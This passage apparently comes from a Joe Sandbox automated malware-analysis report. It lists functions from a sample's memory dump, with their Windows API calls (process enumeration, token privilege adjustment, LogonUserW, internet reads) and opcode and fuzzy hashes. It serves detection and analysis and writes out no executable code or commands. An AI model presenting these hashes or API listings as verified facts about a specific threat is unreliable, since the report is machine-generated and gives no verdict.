                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                      • String ID:
                                                                      • API String ID: 2576544623-0
                                                                      • Opcode ID: 92e2afb3da72be8f6171e2720b53aa9c3be30ebf2a37370583deb566e7d04a15
                                                                      • Instruction ID: db7f1ad0103d20d9434ca36909bd0900fb51f37876ac286ad8ce307627433b6d
                                                                      • Opcode Fuzzy Hash: 92e2afb3da72be8f6171e2720b53aa9c3be30ebf2a37370583deb566e7d04a15
                                                                      • Instruction Fuzzy Hash: 39516271504305AFD310EF24DC4AEABBBE8FFD8710F50481DF99596251EB709948CB92
                                                                      Function 0056E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0056E628
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: ccc67d494fe58266b52db074cbb883110d6305296d6d76bb1d18afe60413b276
                                                                      • Instruction ID: 08a373c3698c645c49f7c24e9a295c5c9070b5ef024cb56a636de784e52fb0b9
                                                                      • Opcode Fuzzy Hash: ccc67d494fe58266b52db074cbb883110d6305296d6d76bb1d18afe60413b276
                                                                      • Instruction Fuzzy Hash: 2B323679A017059FDB28CF59D48596ABBF0FF48320B15C46EE89ADB3A1E770E941CB40
                                                                      Function 005822EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0058180A,00000000), ref: 005823E1
                                                                      • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00582418
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$AvailableDataFileQueryRead
                                                                      • String ID:
                                                                      • API String ID: 599397726-0
                                                                      • Opcode ID: 590fb56bd6c5f8ce0b51b515b89395d5f7b20017e5ed4b0f617c7102a1660cf3
                                                                      • Instruction ID: 4961ec708927b5702eda9621c847dd2a3481b532b362d3736a84b67c3414b02c
                                                                      • Opcode Fuzzy Hash: 590fb56bd6c5f8ce0b51b515b89395d5f7b20017e5ed4b0f617c7102a1660cf3
                                                                      • Instruction Fuzzy Hash: B741C471A04209BFEF10AE95DC85EBBBFBCFB40314F10486AFE01B6190EA759E419760
                                                                      Function 0057B333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0057B343
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0057B39D
                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0057B3EA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 292222fe4cced296cec8a0b18fe38c2d86a40a35a936dd85d222f04aad4ee6f5
                                                                      • Instruction ID: b43e49a95d751bdd6b996a98eeeacf1aab56399196a484a8902d26e6d94d78bf
                                                                      • Opcode Fuzzy Hash: 292222fe4cced296cec8a0b18fe38c2d86a40a35a936dd85d222f04aad4ee6f5
                                                                      • Instruction Fuzzy Hash: BF215E35A00508EFDB00EFA5D885EEDBBB8FF89310F1480AAE905AB351DB319955DB51
                                                                      Function 005687E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00530DB6: std::exception::exception.LIBCMT ref: 00530DEC
                                                                        • Part of subcall function 00530DB6: __CxxThrowException@8.LIBCMT ref: 00530E01
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0056882B
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00568858
                                                                      • GetLastError.KERNEL32 ref: 00568865
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1922334811-0
                                                                      • Opcode ID: 0d617ae08854b2604ecd9b14089131f86284939abb7adbb619190a61726af459
                                                                      • Instruction ID: 84093d1ec1a8e43e55ac220da7527b34c68e49e378a126b67a5e6004ead4f7d9
                                                                      • Opcode Fuzzy Hash: 0d617ae08854b2604ecd9b14089131f86284939abb7adbb619190a61726af459
                                                                      • Instruction Fuzzy Hash: 751160B1514305AFD718EF54DC89D7BBBECFB44710B108A2EE45697241DA70BC448B60
                                                                      Function 0056874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00568774
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0056878B
                                                                      • FreeSid.ADVAPI32(?), ref: 0056879B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: f64ff19cc49927cf38800247c4d4c53f6cb4b73c7ceed919cccb8b406f9d4734
                                                                      • Instruction ID: c304afad7feab8e642dfa696b1f24434943d9627361ee9b5fabf1ddc6cb4753b
                                                                      • Opcode Fuzzy Hash: f64ff19cc49927cf38800247c4d4c53f6cb4b73c7ceed919cccb8b406f9d4734
                                                                      • Instruction Fuzzy Hash: AFF04975A1130CFFDF00DFF4DC89ABEBBBCEF08201F1045A9A902E2181E6716A089B50
                                                                      Function 00578889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __time64.LIBCMT ref: 0057889B
                                                                        • Part of subcall function 0053520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00578F6E,00000000,?,?,?,?,0057911F,00000000,?), ref: 00535213
                                                                        • Part of subcall function 0053520A: __aulldiv.LIBCMT ref: 00535233
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Time$FileSystem__aulldiv__time64
                                                                      • String ID: 0e]
                                                                      • API String ID: 2893107130-3598356009
                                                                      • Opcode ID: c140ef4b554ccf4f5259d8ed22127944f4562c9d6227cfcc5beb49424b12c2dd
                                                                      • Instruction ID: 64954e5d94bc026087af0c88b5729d369d5cd61841d9e8cc65592923032df37a
                                                                      • Opcode Fuzzy Hash: c140ef4b554ccf4f5259d8ed22127944f4562c9d6227cfcc5beb49424b12c2dd
                                                                      • Instruction Fuzzy Hash: C421E432635511CBC329CF29E841A62B7E1EFA4310F688E6DD0F9CB2C0CA34B949DB54
                                                                      Function 0057C6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0057C6FB
                                                                      • FindClose.KERNEL32(00000000), ref: 0057C72B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: dee4c44988fbc5f71f05adde81a7d54cadb953661cd6b139dd5d43524952a34d
                                                                      • Instruction ID: b8e6a37167ca9007fd6aab9c41a360bb0a0f95c0ebc4e6aaf6c3e6a3f839a933
                                                                      • Opcode Fuzzy Hash: dee4c44988fbc5f71f05adde81a7d54cadb953661cd6b139dd5d43524952a34d
                                                                      • Instruction Fuzzy Hash: 131182716002019FDB10DF29D859A6AFBE8FF95320F00891EF8AAC7290DB30A805CB81
                                                                      Function 0057A06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00589468,?,0059FB84,?), ref: 0057A097
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00589468,?,0059FB84,?), ref: 0057A0A9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: 7ad51baf980c6dc0b3ce5c1de4a748c33d638b0149172a8f87535366bcd12014
                                                                      • Instruction ID: 1793d03f9c5dd691a9246f1834eb23cd0171c1381220b96ad1a7e27eefb13f51
                                                                      • Opcode Fuzzy Hash: 7ad51baf980c6dc0b3ce5c1de4a748c33d638b0149172a8f87535366bcd12014
                                                                      • Instruction Fuzzy Hash: 6CF0823510522DBBDB219FA4DC4CFEE7B6CBF08361F008566F909D6181DA309944DBA1
                                                                      Function 005681CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00568309), ref: 005681E0
                                                                      • CloseHandle.KERNEL32(?,?,00568309), ref: 005681F2
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: cec379862ba122c46370442b7157689e02cfa2beb70b5013752d3411f9c3c5a7
                                                                      • Instruction ID: 565048c56b8f951929289a53abe895925803d2fe7df2ca01aac59897c45967ca
                                                                      • Opcode Fuzzy Hash: cec379862ba122c46370442b7157689e02cfa2beb70b5013752d3411f9c3c5a7
                                                                      • Instruction Fuzzy Hash: 04E0B672010621AEE7252B60EC09D777BAEFB44311B15992AB8A6C4470DB62ACA1EB10
                                                                      Function 0053A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00538D57,?,?,?,00000001), ref: 0053A15A
                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0053A163
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: 464b03f8e453b46cb635b6663512d5bbf7192445fe4138e701e186f6d0db772a
                                                                      • Instruction ID: de64b49f3a71e70817db547b315c04e62ab0b86963f72de1e51e2827076ce079
                                                                      • Opcode Fuzzy Hash: 464b03f8e453b46cb635b6663512d5bbf7192445fe4138e701e186f6d0db772a
                                                                      • Instruction Fuzzy Hash: FAB09231054208EBCA002BA1EC09B883F68EB54BA2F414422F60DC4060CB6654A4AB91
                                                                      Function 0053F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 26ffc015e3122c9055212857764056fc3dc4565d5b28c1f4a6d5e5b500060d64
                                                                      • Instruction ID: bb813ace5f0287d28b2c9acd3711cbc7c2f1f9039c1e243eec322a4e7c76126c
                                                                      • Opcode Fuzzy Hash: 26ffc015e3122c9055212857764056fc3dc4565d5b28c1f4a6d5e5b500060d64
                                                                      • Instruction Fuzzy Hash: 3032F362D29F094DD7239634DC32336A749AFB73D4F15D737E81AB59A6EB28C4835200
                                                                      Function 0054242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9f6a899066351fd442cf40cd04c744787bdbe4701762e702617e39dc9a44d790
                                                                      • Instruction ID: 7e7805af5769f888d10217997299b0104c277b240e7cbb089a640b8a54929cc7
                                                                      • Opcode Fuzzy Hash: 9f6a899066351fd442cf40cd04c744787bdbe4701762e702617e39dc9a44d790
                                                                      • Instruction Fuzzy Hash: 25B10130D2AF504DD76396388831336BA9CAFBB2C9F91D71BFC2674D22EB2185879141
                                                                      Function 00574C53 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00574C76
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: mouse_event
                                                                      • String ID:
                                                                      • API String ID: 2434400541-0
                                                                      • Opcode ID: c4172c7799b2c3b89771b3ba0070b24bcfdb9ba3c79cd920d03648b285538daf
                                                                      • Instruction ID: 54ddbe61801b0041861a979afd41398d583620acb9fda1172d5bd1a3430ec70e
                                                                      • Opcode Fuzzy Hash: c4172c7799b2c3b89771b3ba0070b24bcfdb9ba3c79cd920d03648b285538daf
                                                                      • Instruction Fuzzy Hash: 0AD017A016220979EE290F20AA4BB7A190DF380781F85C54A7249890C0AA915C40B836
                                                                      Function 005687B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00568389), ref: 005687D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: LogonUser
                                                                      • String ID:
                                                                      • API String ID: 1244722697-0
                                                                      • Opcode ID: 489548c904cedb52ba46ae243385962e0c6be5e4d370f103a6de592ac154099a
                                                                      • Instruction ID: 62b070642736a9f9572598796c6d56acc128f46be4d09a92b605b999fd13c4bd
                                                                      • Opcode Fuzzy Hash: 489548c904cedb52ba46ae243385962e0c6be5e4d370f103a6de592ac154099a
                                                                      • Instruction Fuzzy Hash: CFD05E3226450EABEF018EA4DC05EAE3B69EB04B01F408111FE16C50A1C775D835AB60
                                                                      Function 0053A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0053A12A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: ce9842cd0d90904f79a82570b5c2b354163bf69735c91ce26cc270abdb59fe05
                                                                      • Instruction ID: 77e18679b3177c81cf7c2c82a6c67d7b1c090047e35c5de73b8dde14c1521e3c
                                                                      • Opcode Fuzzy Hash: ce9842cd0d90904f79a82570b5c2b354163bf69735c91ce26cc270abdb59fe05
                                                                      • Instruction Fuzzy Hash: 4DA0113000020CEB8A002BA2EC08888BFACEA002A0B008022F80C800228B32A8A0AA80
                                                                      Function 00528808 Relevance: .6, Instructions: 590COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6615af9e8f7328526e110e9731c893a491608f7d5bccdad9fe9a858735eebb62
                                                                      • Instruction ID: 9fc0e9f7f5049728d12eb680bc47a7ee268f182dfbc36e6306273833d712e097
                                                                      • Opcode Fuzzy Hash: 6615af9e8f7328526e110e9731c893a491608f7d5bccdad9fe9a858735eebb62
                                                                      • Instruction Fuzzy Hash: F6222530A055268BDF388AA4E4D477C7FA1FF43314F28886AD9928B5D2EF709DD1CA41
                                                                      Function 005321C5 Relevance: .3, Instructions: 345COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
